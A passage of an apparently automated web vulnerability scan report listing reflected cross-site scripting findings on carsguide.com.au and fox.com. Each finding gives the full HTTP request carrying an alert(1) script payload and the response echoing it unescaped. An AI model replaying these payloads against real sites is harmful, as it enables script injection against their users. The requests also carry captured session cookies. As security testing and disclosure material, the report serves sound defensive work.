X-Powered-By: PHP/5.2.9
ServerHost: (null)
Content-Length: 38708
Content-Type: text/html; charset=iso-8859-1
Expires: Tue, 04 Oct 2011 20:15:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:15:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>Page Not Found
...[SNIP]...
<!-- us : top_10/cars/fastest-cars-in-the-world.html5930d--><script>alert(1)</script>e54392f1e73/-->

1.139. http://www.carsguide.com.au/search/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.carsguide.com.au
Path:   /search/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4c784'><script>alert(1)</script>1c084a16ce2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/?N=4294962119&origin=browse&Nf=pYear|GTEQ%202008&type=cars&4c784'><script>alert(1)</script>1c084a16ce2=1 HTTP/1.1
Host: www.carsguide.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.carsguide.com.au/search/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=rGM2nkaLMWf-XMYANDn; recent_search_value=2010; recent_search_url=http://www.carsguide.com.au/search/?N~4294962119&origin~browse&Nf~pYear|GTEQ%202010&type~cars; __utma=177971127.1567727582.1317753560.1317756126.1317758800.3; __utmb=177971127.1.10.1317758800; __utmc=177971127; __utmz=177971127.1317758800.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; sopsview=4; prev_google_param=; home_page=yes; session_start_time=1317758866493; k_visit=3; NetInsightSessionID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: max-age=300
Date: Tue, 04 Oct 2011 20:22:54 GMT
Content-Length: 163365
Connection: close


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="http://rdf.data-
...[SNIP]...
<a href='http://www.carsguide.com.au/search/vehicle-details/D_27018486/@N=4294962119&origin=browse&Nf=pYear|GTEQ%202008&type=cars&4c784'><script>alert(1)</script>1c084a16ce2=1&searchType=1&vehicleType=1&pos=1&nr=New_700410820110308'>
...[SNIP]...

1.140. http://www.carsguide.com.au/search/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.carsguide.com.au
Path:   /search/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab6bb"-alert(1)-"4596c19f3ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search/?N=4294962119&origin=browse&Nf=pYear|GTEQ%202008&type=cars&ab6bb"-alert(1)-"4596c19f3ae=1 HTTP/1.1
Host: www.carsguide.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.carsguide.com.au/search/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=rGM2nkaLMWf-XMYANDn; recent_search_value=2010; recent_search_url=http://www.carsguide.com.au/search/?N~4294962119&origin~browse&Nf~pYear|GTEQ%202010&type~cars; __utma=177971127.1567727582.1317753560.1317756126.1317758800.3; __utmb=177971127.1.10.1317758800; __utmc=177971127; __utmz=177971127.1317758800.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; sopsview=4; prev_google_param=; home_page=yes; session_start_time=1317758866493; k_visit=3; NetInsightSessionID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: max-age=280
Date: Tue, 04 Oct 2011 20:23:19 GMT
Content-Length: 160005
Connection: close


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="http://rdf.data-
...[SNIP]...
   $(document).CG_setCookie("recent_search_value","2008");
       $(document).CG_setCookie("recent_search_url","http://www.carsguide.com.au/search/?N~4294962119&origin~browse&Nf~pYear|GTEQ%202008&type~cars&ab6bb"-alert(1)-"4596c19f3ae~1");
    </script>
...[SNIP]...

1.141. http://www.carsguide.com.au/search/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.carsguide.com.au
Path:   /search/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d43e"><script>alert(1)</script>8ac1c0a1eaa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/?N=4294962119&origin=browse&Nf=pYear|GTEQ%202008&type=cars&9d43e"><script>alert(1)</script>8ac1c0a1eaa=1 HTTP/1.1
Host: www.carsguide.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.carsguide.com.au/search/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=rGM2nkaLMWf-XMYANDn; recent_search_value=2010; recent_search_url=http://www.carsguide.com.au/search/?N~4294962119&origin~browse&Nf~pYear|GTEQ%202010&type~cars; __utma=177971127.1567727582.1317753560.1317756126.1317758800.3; __utmb=177971127.1.10.1317758800; __utmc=177971127; __utmz=177971127.1317758800.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; sopsview=4; prev_google_param=; home_page=yes; session_start_time=1317758866493; k_visit=3; NetInsightSessionID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: max-age=291
Date: Tue, 04 Oct 2011 20:22:44 GMT
Content-Length: 163365
Connection: close


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="http://rdf.data-
...[SNIP]...
<a title="remove" href="http://www.carsguide.com.au/search/?9d43e"><script>alert(1)</script>8ac1c0a1eaa=1&origin=browse&type=cars&N=4294962119">
...[SNIP]...

1.142. http://www.carsguide.com.au/search/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.carsguide.com.au
Path:   /search/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload a844c><script>alert(1)</script>159981e1a16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/?N=4294962119&origin=browse&Nf=pYear|GTEQ%202008&type=cars&a844c><script>alert(1)</script>159981e1a16=1 HTTP/1.1
Host: www.carsguide.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.carsguide.com.au/search/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=rGM2nkaLMWf-XMYANDn; recent_search_value=2010; recent_search_url=http://www.carsguide.com.au/search/?N~4294962119&origin~browse&Nf~pYear|GTEQ%202010&type~cars; __utma=177971127.1567727582.1317753560.1317756126.1317758800.3; __utmb=177971127.1.10.1317758800; __utmc=177971127; __utmz=177971127.1317758800.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; sopsview=4; prev_google_param=; home_page=yes; session_start_time=1317758866493; k_visit=3; NetInsightSessionID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: max-age=270
Date: Tue, 04 Oct 2011 20:23:04 GMT
Content-Length: 163141
Connection: close


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="http://rdf.data-
...[SNIP]...
<a href=http://www.carsguide.com.au/search/vehicle-details/D_27018486/@N=4294962119&origin=browse&Nf=pYear|GTEQ%202008&type=cars&a844c><script>alert(1)</script>159981e1a16=1&searchType=1&vehicleType=1&pos=1&nr=New_700410820110308>
...[SNIP]...

1.143. http://www.carsguide.com.au/search/ [origin parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.carsguide.com.au
Path:   /search/

Issue detail

The value of the origin request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44e9a"-alert(1)-"20a8672a183 was submitted in the origin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search/?N=4294962119&origin=browse44e9a"-alert(1)-"20a8672a183&Nf=pYear|GTEQ%202008&type=cars HTTP/1.1
Host: www.carsguide.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.carsguide.com.au/search/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=rGM2nkaLMWf-XMYANDn; recent_search_value=2010; recent_search_url=http://www.carsguide.com.au/search/?N~4294962119&origin~browse&Nf~pYear|GTEQ%202010&type~cars; __utma=177971127.1567727582.1317753560.1317756126.1317758800.3; __utmb=177971127.1.10.1317758800; __utmc=177971127; __utmz=177971127.1317758800.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; sopsview=4; prev_google_param=; home_page=yes; session_start_time=1317758866493; k_visit=3; NetInsightSessionID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: max-age=287
Date: Tue, 04 Oct 2011 20:21:56 GMT
Content-Length: 159334
Connection: close


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="http://rdf.data-
...[SNIP]...
<script>
       $(document).CG_setCookie("recent_search_value","2008");
       $(document).CG_setCookie("recent_search_url","http://www.carsguide.com.au/search/?N~4294962119&origin~browse44e9a"-alert(1)-"20a8672a183&Nf~pYear|GTEQ%202008&type~cars");
    </script>
...[SNIP]...

1.144. http://www.carsguide.com.au/search/ [origin parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.carsguide.com.au
Path:   /search/

Issue detail

The value of the origin request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c8533'><script>alert(1)</script>b5e3982c842 was submitted in the origin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/?N=4294962119&origin=browsec8533'><script>alert(1)</script>b5e3982c842&Nf=pYear|GTEQ%202008&type=cars HTTP/1.1
Host: www.carsguide.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.carsguide.com.au/search/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=rGM2nkaLMWf-XMYANDn; recent_search_value=2010; recent_search_url=http://www.carsguide.com.au/search/?N~4294962119&origin~browse&Nf~pYear|GTEQ%202010&type~cars; __utma=177971127.1567727582.1317753560.1317756126.1317758800.3; __utmb=177971127.1.10.1317758800; __utmc=177971127; __utmz=177971127.1317758800.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; sopsview=4; prev_google_param=; home_page=yes; session_start_time=1317758866493; k_visit=3; NetInsightSessionID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: max-age=296
Date: Tue, 04 Oct 2011 20:21:31 GMT
Content-Length: 162694
Connection: close


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="http://rdf.data-
...[SNIP]...
<a href='http://www.carsguide.com.au/search/vehicle-details/D_27018486/@N=4294962119&origin=browsec8533'><script>alert(1)</script>b5e3982c842&Nf=pYear|GTEQ%202008&type=cars&searchType=1&vehicleType=1&pos=1&nr=New_700410820110308'>
...[SNIP]...

1.145. http://www.carsguide.com.au/search/ [origin parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.carsguide.com.au
Path:   /search/

Issue detail

The value of the origin request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 8c458><script>alert(1)</script>bdec3ca667b was submitted in the origin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/?N=4294962119&origin=browse8c458><script>alert(1)</script>bdec3ca667b&Nf=pYear|GTEQ%202008&type=cars HTTP/1.1
Host: www.carsguide.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.carsguide.com.au/search/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=rGM2nkaLMWf-XMYANDn; recent_search_value=2010; recent_search_url=http://www.carsguide.com.au/search/?N~4294962119&origin~browse&Nf~pYear|GTEQ%202010&type~cars; __utma=177971127.1567727582.1317753560.1317756126.1317758800.3; __utmb=177971127.1.10.1317758800; __utmc=177971127; __utmz=177971127.1317758800.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; sopsview=4; prev_google_param=; home_page=yes; session_start_time=1317758866493; k_visit=3; NetInsightSessionID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: max-age=295
Date: Tue, 04 Oct 2011 20:21:41 GMT
Content-Length: 162470
Connection: close


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="http://rdf.data-
...[SNIP]...
<a href=http://www.carsguide.com.au/search/vehicle-details/D_27018486/@N=4294962119&origin=browse8c458><script>alert(1)</script>bdec3ca667b&Nf=pYear|GTEQ%202008&type=cars&searchType=1&vehicleType=1&pos=1&nr=New_700410820110308>
...[SNIP]...

1.146. http://www.carsguide.com.au/search/ [origin parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.carsguide.com.au
Path:   /search/

Issue detail

The value of the origin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa0d4"><script>alert(1)</script>2cca48b2cd6 was submitted in the origin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/?N=4294962119&origin=browsefa0d4"><script>alert(1)</script>2cca48b2cd6&Nf=pYear|GTEQ%202008&type=cars HTTP/1.1
Host: www.carsguide.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.carsguide.com.au/search/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=rGM2nkaLMWf-XMYANDn; recent_search_value=2010; recent_search_url=http://www.carsguide.com.au/search/?N~4294962119&origin~browse&Nf~pYear|GTEQ%202010&type~cars; __utma=177971127.1567727582.1317753560.1317756126.1317758800.3; __utmb=177971127.1.10.1317758800; __utmc=177971127; __utmz=177971127.1317758800.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; sopsview=4; prev_google_param=; home_page=yes; session_start_time=1317758866493; k_visit=3; NetInsightSessionID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: max-age=288
Date: Tue, 04 Oct 2011 20:21:20 GMT
Content-Length: 162694
Connection: close


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="http://rdf.data-
...[SNIP]...
<a title="remove" href="http://www.carsguide.com.au/search/?origin=browsefa0d4"><script>alert(1)</script>2cca48b2cd6&type=cars&N=4294962119">
...[SNIP]...

1.147. http://www.fox.com/_ugc/xml/homepage_ep_2011-10-4.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ugc/xml/homepage_ep_2011-10-4.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c8fd"-alert(1)-"38339057e99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ugc2c8fd"-alert(1)-"38339057e99/xml/homepage_ep_2011-10-4.xml HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/flash/EditorialPod.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.111
Content-Type: text/html; charset=utf-8
Content-Length: 21897
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:10:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ugc2c8fd"-alert(1)-"38339057e99:xmlhomepage_ep_2011-10-4"
s_analytics.hier1="fox:shows:_ugc2c8fd"-alert(1)-"38339057e99:xmlhomepage_ep_2011-10-4" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ugc2c8fd"-ale
...[SNIP]...

1.148. http://www.fox.com/_ugc/xml/homepage_ep_2011-10-4.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ugc/xml/homepage_ep_2011-10-4.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f997"-alert(1)-"b5848d7db55 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ugc/xml3f997"-alert(1)-"b5848d7db55/homepage_ep_2011-10-4.xml HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/flash/EditorialPod.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.118
Content-Type: text/html; charset=utf-8
Content-Length: 21869
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:10:13 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ugc:xml3f997"-alert(1)-"b5848d7db55homepage_ep_2011-10-4"
s_analytics.hier1="fox:shows:_ugc:xml3f997"-alert(1)-"b5848d7db55homepage_ep_2011-10-4" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ugc:xml3f997"-ale
...[SNIP]...

1.149. http://www.fox.com/_ugc/xml/homepage_ep_2011-10-4.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ugc/xml/homepage_ep_2011-10-4.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a6d4"-alert(1)-"dd4b1ac882d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ugc/xml/homepage_ep_2011-10-4.xml1a6d4"-alert(1)-"dd4b1ac882d HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/flash/EditorialPod.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.111
Content-Type: text/html; charset=utf-8
Content-Length: 21757
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:10:17 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
s" //Site Section
s_analytics.prop7="fox:shows:_ugc" //Site Sub - Section
s_analytics.prop8="fox:shows:_ugc:xm" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ugc:xmlhomepage_ep_2011-10-4.xml1a6d4"-alert(1)-"dd4b1ac882d"
s_analytics.prop15="sub section:homepage_ep_2011-10-4" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_a
...[SNIP]...

1.150. http://www.fox.com/_ui/fox_player/swf/FoxAnalyticsExtension.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/FoxAnalyticsExtension.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8df44"-alert(1)-"519baa039a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

